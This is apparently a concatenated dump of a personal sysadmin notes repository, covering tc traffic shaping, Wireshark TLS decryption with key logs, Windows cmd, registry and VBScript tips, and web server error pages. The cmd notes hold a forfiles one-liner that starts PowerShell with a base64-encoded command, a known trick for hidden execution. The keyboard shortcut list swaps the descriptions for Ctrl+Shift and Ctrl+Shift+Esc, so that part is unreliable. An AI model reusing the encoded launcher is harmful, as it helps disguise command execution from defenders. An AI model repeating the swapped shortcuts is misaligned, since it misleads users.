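the ``Sent ... (dropped ..., overlimits ...)`` counters into numbers and diffs two
samples, which is the quickest way to see whether a TBF, HTB class or police rule
is actually delaying or dropping packets. The sample outputs are constructed.

```python
"""Parse ``tc -s qdisc show`` / ``tc -s class show`` statistics.

Added example, not from the original page: the "dropped" and "overlimits"
counters are what tell you whether a TBF, HTB class or ingress police rule is
actually biting. This turns the counters into numbers and diffs two samples.
The sample outputs below are constructed in the layout ``tc`` prints.
"""
import re

# "qdisc tbf 8002: root ..." / "class htb 1:10 root ..." introduce an object.
HEADER_RE = re.compile(r"^(qdisc|class) (\S+) (\S+:\S*) ")
# Statistics line printed under each object when -s is given.
SENT_RE = re.compile(
    r"Sent (\d+) bytes (\d+) pkt \(dropped (\d+), overlimits (\d+) requeues (\d+)\)"
)
COUNTERS = ("sent_bytes", "sent_pkt", "dropped", "overlimits", "requeues")


def parse_tc_stats(output):
    """Return a list of dicts, one per qdisc/class, with its counters."""
    entries = []
    for line in output.splitlines():
        line = line.strip()
        header = HEADER_RE.match(line)
        if header:
            entry = {"object": header.group(1), "kind": header.group(2),
                     "handle": header.group(3)}
            entry.update(dict.fromkeys(COUNTERS, 0))
            entries.append(entry)
            continue
        stats = SENT_RE.search(line)
        if stats and entries:
            # Counters belong to the most recently seen qdisc/class.
            entries[-1].update(zip(COUNTERS, map(int, stats.groups())))
    return entries


def shaping_report(before, after):
    """Diff two ``tc -s`` samples, keyed by (object, handle).

    A growing "overlimits" counter means the rule delayed packets; a growing
    "dropped" counter means it discarded them (expected for ``police ... drop``).
    """
    earlier = {(e["object"], e["handle"]): e for e in parse_tc_stats(before)}
    report = {}
    for entry in parse_tc_stats(after):
        key = (entry["object"], entry["handle"])
        base = earlier.get(key, dict.fromkeys(COUNTERS, 0))
        report[key] = {name: entry[name] - base[name] for name in COUNTERS}
    return report


# Constructed samples: a TBF on eth0 before and after a large transfer.
SAMPLE_BEFORE = """\
qdisc tbf 8002: root refcnt 2 rate 1Mbit burst 10Kb lat 70.0ms
 Sent 42000 bytes 1337 pkt (dropped 0, overlimits 0 requeues 0)
 backlog 0b 0p requeues 0
"""
SAMPLE_AFTER = """\
qdisc tbf 8002: root refcnt 2 rate 1Mbit burst 10Kb lat 70.0ms
 Sent 1337000 bytes 2000 pkt (dropped 12, overlimits 250 requeues 0)
 backlog 0b 0p requeues 0
"""

if __name__ == "__main__":
    for key, delta in shaping_report(SAMPLE_BEFORE, SAMPLE_AFTER).items():
        print(key, delta)
```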


Make downloads slow
-------------------

In order to slow down downloads to prevent them from filling the ISP's buffers, you
can attach a filter in ingress mode which drops packets that arrive too fast::

    tc qdisc add dev eth0 handle ffff: ingress
    tc filter add dev eth0 parent ffff: protocol ip prio 50 u32 \
        match ip src 0.0.0.0/0 police rate 800kbit burst 10k drop flowid :1

After that, the statistics commands display this::

    # tc qdisc show dev eth0
    qdisc pfifo_fast 0: dev eth0 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1
    qdisc ingress ffff: dev eth0 parent ffff:fff1 ----------------

    # tc filter show dev eth0 parent ffff:
    filter protocol ip pref 50 u32
    filter protocol ip pref 50 u32 fh 800: ht divisor 1
    filter protocol ip pref 50 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid :1
      match 00000000/00000000 at 12
        action order 0: police 0x1 rate 800Kbit burst 10Kb mtu 2Kb action drop overhead 0b
        ref 1 bind 1

To delete everything related to the inbound packet policy on ``eth0``, use::

    tc qdisc del dev eth0 ingress
--------------------------------------------------------------------------------
/sysadmin/user.rst:
--------------------------------------------------------------------------------
User management on Linux
========================

Add a new user
--------------

Command:

.. code-block:: sh

    useradd LOGIN

Options::

    -c, --comment "Comment"
    -m, --create-home
    -u, --uid UID

Add an existing user to groups
------------------------------

Example:

.. code-block:: sh

    usermod -a -G sudo,adm user
--------------------------------------------------------------------------------
/sysadmin/wireshark-https.rst:
--------------------------------------------------------------------------------
Wireshark: analyzing HTTPS traffic
==================================

HTTPS packets can be decrypted using the server private key when non-Perfect Forward Secrecy cipher suites are used.
In most cases nowadays, this will not work.
Instead, the master secret needs to be recorded, for example using ``SSLKEYLOGFILE``:

- In Curl: https://everything.curl.dev/usingcurl/tls/sslkeylogfile
- In Firefox: https://firefox-source-docs.mozilla.org/security/nss/legacy/key_log_format/index.html
- In Chrome: option ``--ssl-key-log-file``
- In Python: https://sslkeylog.readthedocs.io/en/latest/
- Wireshark documentation: https://wiki.wireshark.org/TLS#using-the-pre-master-secret

For example:

.. code-block:: sh

    # Capture network traffic
    tshark -ni any -w capture.pcapng

    # Perform a request to an HTTPS website, for example with curl
    SSLKEYLOGFILE=keylogfile.txt curl https://wiki.wireshark.org/

    # Merge the secrets in the Decryption Secrets Block part of the capture file
    editcap --inject-secrets tls,keylogfile.txt capture.pcapng capture-with-secrets.pcapng

    # It is also possible to live-capture with the keylogfile
    # Option -V -O http displays packet details for (decrypted) HTTP
    # Option -x displays hexadecimal data
    tshark -ni any -f 'tcp port 443' -o tls.keylog_file:keylogfile.txt -V -O http -x

The keylogfile then looks like this (for TLS 1.3, one line per secret, each line
holding the label, the client random and the secret):

.. code-block:: text

    SERVER_HANDSHAKE_TRAFFIC_SECRET f3cac18f4b5042390a8929a1bef9e5d543a214d3a163a8649843457e91a95265 5d06ef1d3074b3ce830fddece3000e81028467c30bcd35eeee0ef867f8d22c4a1ab08db4172ac1235faab04b10e6c1e5
    EXPORTER_SECRET f3cac18f4b5042390a8929a1bef9e5d543a214d3a163a8649843457e91a95265 dc27c85675113c4c1b2b0187cb1e2d6615b9039f66fa69e16822ccea989fb45049303113e184f266e672b1e867c03201
    SERVER_TRAFFIC_SECRET_0 f3cac18f4b5042390a8929a1bef9e5d543a214d3a163a8649843457e91a95265 2930b243f1dab9c62dd96439355ebd22a689d3eca9e8acce9fcaad00b3ca7206ccba5258501696f774527398e8dabc49
    CLIENT_HANDSHAKE_TRAFFIC_SECRET f3cac18f4b5042390a8929a1bef9e5d543a214d3a163a8649843457e91a95265 7ed9a53c1b24b70bcd0474ccd85323f14eeb27871d7e68c51c33ab884e3c7bd29bdb749290d564da2dc0aad212c88a65
    CLIENT_TRAFFIC_SECRET_0 f3cac18f4b5042390a8929a1bef9e5d543a214d3a163a8649843457e91a95265 42e9ee4316095ea838daefef1cfdc2587d0fe4369d77dfed0182c2c476cfe54bd86541b3b4b488e908a7f8cf1fe2c436

For TLS 1.2 (for example using ``curl --tlsv1.2 --tls-max 1.2``):

.. code-block:: text

    CLIENT_RANDOM 0e42bf17cf0d1b3140b29b44cddedf29db7abcb5ab01f91259987678e5ce9d57 a9e4f9da3afa588934f984c457bb6fe99a9f77e3e9dd6796c7596d683790f46ba532a1a2e308c52a81ebc03e652f1bae
--------------------------------------------------------------------------------
/windows/Vagrantfile:
--------------------------------------------------------------------------------
# -*- mode: ruby -*-
# vi: set ft=ruby :

Vagrant.configure("2") do |config|
  # cf. vagrant.rst for instructions on downloading and importing windows/win10-edge box
  config.vm.box = "windows/win10-edge"

  # Configure remote access
  config.ssh.username = "IEUser"
  config.ssh.password = "Passw0rd!"

  # Use Windows Remote Management protocol (WinRM)
  #config.vm.communicator = "winrm"
  config.winrm.username = "IEUser"
  config.winrm.password = "Passw0rd!"

  # Use 2 CPU and 4GB of RAM
  config.vm.provider :libvirt do |v|
    v.cpus = 2
    v.memory = 4096

    # Use a virtual TPM 2.0 with swtpm
    v.tpm_model = 'tpm-crb'
    v.tpm_type = 'emulator'
  end
end
--------------------------------------------------------------------------------
/windows/cmd.rst:
--------------------------------------------------------------------------------
Some cmd.exe commands
=====================

Here is a set of commands which are not very easy to remember but can be useful.

Create a file with input from the console::

    copy con new_file.txt

    # Read it
    type new_file.txt
    # Remove it
    del new_file.txt

Resize the window (from http://superuser.com/questions/653390/how-can-i-open-a-console-application-with-a-given-window-size)::

    mode con:cols=140 lines=70

Change colors::

    # Write white on blue background
    color 1f

    # Write dark or light green on black
    color 2
    color a

Run PowerShell using ``forfiles`` (cf. https://twitter.com/AmnaKMahmood/status/1121504040083496961)::

    # /p to specify the path where to start searching,
    # /s to recurse into subdirectories,
    # /m to specify the search mask,
    # /c to run a command, with @file being the name of the file and @path the full path
    forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcA..."
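
As an added example (not part of the original page, nor of Wireshark's own tooling),
here is a Python checker for the ``SSLKEYLOGFILE`` format described in
wireshark-https.rst above: it validates every line and groups the secrets by client
random to tell TLS 1.3 connections from TLS 1.2 ones, which catches a truncated or
wrapped key log before Wireshark silently fails to decrypt. The sample key log is
constructed and contains no real secrets.

```python
"""Sanity-check an NSS key log file (the ``SSLKEYLOGFILE`` format).

Added example, not from the original page or from Wireshark: it validates every
line of a key log and reports, per connection (keyed by the 32-byte client
random), which TLS version was negotiated.  The sample key log below is
constructed and contains no real secrets.
"""
import re
from collections import defaultdict

# TLS 1.3 writes one line per secret; TLS 1.2 and earlier write a single
# CLIENT_RANDOM line carrying the 48-byte master secret.
TLS13_LABELS = {
    "CLIENT_EARLY_TRAFFIC_SECRET", "EARLY_EXPORTER_SECRET",
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET", "SERVER_HANDSHAKE_TRAFFIC_SECRET",
    "CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0", "EXPORTER_SECRET",
}
TLS12_LABEL = "CLIENT_RANDOM"
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def parse_keylog_line(line):
    """Return (label, client_random, secret), or None for blank/comment lines.

    Raises ValueError describing why a line is malformed."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) != 3:
        raise ValueError(f"expected 3 fields, got {len(fields)}")
    label, client_random, secret = fields
    if label != TLS12_LABEL and label not in TLS13_LABELS:
        raise ValueError(f"unknown label {label!r}")
    if not HEX_RE.match(client_random) or len(client_random) != 64:
        raise ValueError("client random must be 32 bytes of hex")
    if not HEX_RE.match(secret):
        raise ValueError("secret is not hex")
    # A TLS 1.2 master secret is always 48 bytes; TLS 1.3 secrets have the
    # length of the cipher suite hash, 32 bytes (SHA-256) or 48 (SHA-384).
    allowed = (96,) if label == TLS12_LABEL else (64, 96)
    if len(secret) not in allowed:
        raise ValueError(f"{label} secret has {len(secret) // 2} bytes")
    return label, client_random.lower(), secret.lower()


def summarize_keylog(text):
    """Return (sessions, errors).

    sessions maps each client random to (tls_version, sorted labels) and
    errors lists "line N: reason" for every line that had to be skipped."""
    labels_by_random = defaultdict(set)
    errors = []
    for lineno, line in enumerate(text.splitlines(), 1):
        try:
            entry = parse_keylog_line(line)
        except ValueError as exc:
            errors.append(f"line {lineno}: {exc}")
            continue
        if entry is not None:
            label, client_random, _secret = entry
            labels_by_random[client_random].add(label)

    sessions = {}
    for client_random, labels in labels_by_random.items():
        if TLS12_LABEL in labels:
            version = "TLS 1.2 or earlier"
        elif {"CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0"} <= labels:
            version = "TLS 1.3"
        else:
            # Only handshake secrets: Wireshark can decrypt the handshake
            # but not the application data of this connection.
            version = "TLS 1.3 (application traffic secrets missing)"
        sessions[client_random] = (version, sorted(labels))
    return sessions, errors


# Constructed sample: one TLS 1.3 connection, one TLS 1.2 connection and one
# CLIENT_RANDOM line whose secret was cut in half, as happens when a line wraps.
RANDOM_A, RANDOM_B, RANDOM_C = "11" * 32, "22" * 32, "33" * 32
SAMPLE_KEYLOG = "\n".join([
    "# constructed sample, not real secrets",
    f"SERVER_HANDSHAKE_TRAFFIC_SECRET {RANDOM_A} {'a1' * 48}",
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {RANDOM_A} {'a2' * 48}",
    f"SERVER_TRAFFIC_SECRET_0 {RANDOM_A} {'a3' * 48}",
    f"CLIENT_TRAFFIC_SECRET_0 {RANDOM_A} {'a4' * 48}",
    f"EXPORTER_SECRET {RANDOM_A} {'a5' * 48}",
    f"CLIENT_RANDOM {RANDOM_B} {'b1' * 48}",
    f"CLIENT_RANDOM {RANDOM_C} {'c1' * 24}",
])

if __name__ == "__main__":
    sessions, errors = summarize_keylog(SAMPLE_KEYLOG)
    for client_random, (version, labels) in sessions.items():
        print(client_random[:16] + "...", version, ", ".join(labels))
    for error in errors:
        print("skipped:", error)
```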
--------------------------------------------------------------------------------
/windows/index.rst:
--------------------------------------------------------------------------------
Windows system information
==========================

This section contains information specific to the Windows operating system.

.. toctree::
   :maxdepth: 2
   :glob:

   *
--------------------------------------------------------------------------------
/windows/key_shortcuts.rst:
--------------------------------------------------------------------------------
Keyboard shortcuts on Windows
=============================

General keyboard shortcuts
--------------------------

* ``F2``:
  Rename the selected item.

* ``F3``:
  Search for a file or folder in File Explorer.

* ``F4``:
  Display the address bar list in File Explorer.

* ``F5`` or ``Ctrl + R``:
  Refresh the active window.

* ``F6``:
  Cycle through screen elements in a window or on the desktop.

* ``F10``:
  Activate the Menu bar in the active app.

* ``Alt + Space``:
  Open the shortcut menu for the active window.

* ``Alt + F4``:
  Close the active item, or exit the active app.

* ``Alt + F8``:
  Show your password on the sign-in screen.

* ``Alt + Tab``:
  Switch between windows.

* ``Ctrl + Alt + Tab``:
  Use the arrow keys to switch between all open apps.

* ``Ctrl + Escape`` or ``Win``:
  Show the start menu.

* ``Ctrl + Shift``:
  Open Task Manager.

* ``Ctrl + Shift + Esc``:
  Switch the keyboard layout when multiple keyboard layouts are available.

* ``Ctrl + Space``:
  Turn the Chinese input method editor (IME) on or off.

* ``Ctrl + A``:
  Select all items in a document or window.

* ``Ctrl + C`` or ``Ctrl + Insert``:
  Copy the selected item.

* ``Ctrl + X``:
  Cut the selected item.

* ``Ctrl + V`` or ``Shift + Insert``:
  Paste the selected item.

* ``Ctrl + Y``:
  Redo an action.

* ``Ctrl + Z``:
  Undo an action.

* ``Shift + F10``:
  Bring up the context menu for the selected item.


Shortcuts using Windows logo key
--------------------------------

* ``Win + Tab``:
  Open Task View, which brings up the overview mode of all windows.

* ``Win + Space``:
  Switch input language and keyboard layout.

* ``Win + Ctrl + Space``:
  Change to a previously selected input.

* ``Win + Ctrl + Enter``:
  Turn on Narrator.

* ``Win + A``:
  Open Action center.

* ``Win + B``:
  Set focus in the notification area.

* ``Win + D``:
  Show/hide the desktop.

* ``Win + Shift + D``:
  Show/hide the date and time on the desktop.

* ``Win + E``:
  Open file explorer.

* ``Win + I``:
  Open settings.

* ``Win + L``:
  Lock the PC or switch accounts.

* ``Win + M``:
  Minimize all windows.

* ``Win + Shift + M``:
  Restore minimized windows on the desktop.

* ``Win + O``:
  Lock device orientation.

* ``Win + P``:
  Choose a presentation display mode.

* ``Win + R``:
  Bring up the "Run" dialog box. It allows you to type in the internal executable name to run it.

* ``Win + S``:
  Open search.

* ``Win + Shift + S``:
  Perform a partial screenshot. It allows you to select what you want screenshotted.

* ``Win + T``:
  Cycle through apps on the taskbar.

* ``Win + V``:
  Open the Windows clipboard manager (this shortcut is enabled in Start > Settings > System > Clipboard > Clipboard history).

* ``Win + X``:
  Open the Quick Link menu.
  Bring up a list of actions, including "Start PowerShell as Admin".

* ``Win + Z``:
  Show the commands available in an app in full-screen mode.

* ``Win + .`` or ``Win + ;``:
  Bring up the emoji picker. After pressing, start typing to search.

* ``Win + ,``:
  Temporarily peek at the desktop.

* ``Win + Plus``:
  Open Magnifier.

* ``Win + /``:
  Begin Chinese input method editor (IME) reconversion.


Virtual desktops commands
-------------------------

* ``Win + Ctrl + D``:
  Add a new virtual desktop.

* ``Win + Ctrl + Left Arrow``, ``Win + Ctrl + Right Arrow``:
  Move between virtual desktops.

* ``Win + Ctrl + F4``:
  Close the current virtual desktop.


Documentation
-------------

* https://support.microsoft.com/en-us/help/12445/windows-keyboard-shortcuts
* https://unicorn-utterances.com/posts/ultimate-windows-development-environment-guide/#built-in-keyboard-shortcuts
--------------------------------------------------------------------------------
/windows/utc-clock.rst:
--------------------------------------------------------------------------------
Set hardware clock to UTC
-------------------------

Some OSes like GNU/Linux and macOS set up the hardware clock to use UTC instead
of local time. This helps when dealing with daylight saving time, as the real-time
clock does not need to be updated accordingly.

Windows expects the hardware clock to give "local time" by default. The reason
is, according to Microsoft, so that users are not confused in the BIOS menu
(http://blogs.msdn.com/b/oldnewthing/archive/2004/09/02/224672.aspx).

To enable the UTC real-time clock in Windows, put this in a ``.reg`` file::

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
    "RealTimeIsUniversal"=dword:00000001

Apply this file for example with a command like::

    reg import utc-clock.reg

Or directly set the value with::

    reg add HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation /v RealTimeIsUniversal /t REG_DWORD /d 1

To check the current config, you can use::

    > reg query HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation /v RealTimeIsUniversal

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation
        RealTimeIsUniversal    REG_DWORD    0x1
--------------------------------------------------------------------------------
/windows/vbscript.rst:
--------------------------------------------------------------------------------
Some VBScript commands
======================

VBScript is a light version of Microsoft's programming language Visual Basic.
It can be used in ASP (Active Server Pages) between the tags ``<%`` and ``%>``, or run as a standalone script using a file ending with ``.vbs`` and the interpreter ``wscript.exe``.

Special variables
-----------------

When launching a script:

* ``WScript.ScriptFullName`` contains the path of the script
* ``WScript.Arguments(0)`` contains the first argument of the invocation

Launch a process
----------------

.. code-block:: vbscript

    Dim objShell, strCommand
    Set objShell = CreateObject("Wscript.Shell")

    ' Show string concatenation and use Chr(), even though this is a trivial example
    strCommand = "cmd /c" & Chr(32) & "echo Hello"

    ' Syntax: objShell.Run (strCommand, [intWindowStyle], [bWaitOnReturn])
    objShell.Run strCommand, 0, true

    Set objShell = Nothing
--------------------------------------------------------------------------------
/www/htdocs/403.html:
--------------------------------------------------------------------------------
403 Forbidden

Forbidden

You don't have permission to access the requested object.
It is either read-protected or not readable by the server.
--------------------------------------------------------------------------------
/www/htdocs/404.html:
--------------------------------------------------------------------------------
404 Not Found

Not Found

The requested URL was not found on this server.
If you entered the URL manually please check your spelling and try again.
--------------------------------------------------------------------------------
/www/htdocs/500.html:
--------------------------------------------------------------------------------
500 Internal Server Error

500 Internal Server Error

The server encountered an internal error and was unable to complete your request.
--------------------------------------------------------------------------------
/www/htdocs/50x.html:
--------------------------------------------------------------------------------
Server Temporarily Unavailable

Server Temporarily Unavailable

The page you are looking for is temporarily unavailable.
Please try again later.
--------------------------------------------------------------------------------
/www/htdocs/down.html:
--------------------------------------------------------------------------------
It does NOT work!

This website is down

Some nasty technical issues occurred and the website has been temporarily
shut down for safety reasons. Please come back later.
--------------------------------------------------------------------------------
/www/htdocs/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fishilico/generic-config/2593f3f7d5f0a891e278d773c0cd3b2120b656f0/www/htdocs/favicon.ico
--------------------------------------------------------------------------------
/www/htdocs/index-nothing.html:
--------------------------------------------------------------------------------
Nothing interesting here

Nothing interesting here

This host doesn't publish anything on HTTP.
Please go somewhere else.
--------------------------------------------------------------------------------
/www/htdocs/robots.txt:
--------------------------------------------------------------------------------
User-agent: *
Disallow: /
--------------------------------------------------------------------------------
/www/index.rst:
--------------------------------------------------------------------------------
WWW server files (``/var/www``)
===============================

.. toctree::
   :maxdepth: 1
   :glob:

   **

This directory contains basic files which are put on every web server that is not
really public. This means that the primary function of the web server which
serves these files is not to be a cool website but something else, like
monitoring, statistics, file sharing...

Web server configuration
------------------------

If you're using nginx, put these lines into your default vhost::

    root /path/to/www/htdocs;
    error_page 403 /403.html;
    error_page 404 /404.html;
    error_page 500 /500.html;
    error_page 500 502 503 504 /50x.html;
    index index.html;
    try_files $uri $uri/ =404;

With Apache, use::

    DocumentRoot "/path/to/www/htdocs"
    ErrorDocument 403 "/403.html"
    ErrorDocument 404 "/404.html"
    ErrorDocument 500 "/500.html"
    ErrorDocument 502 "/50x.html"
    ErrorDocument 503 "/50x.html"
    ErrorDocument 504 "/50x.html"
--------------------------------------------------------------------------------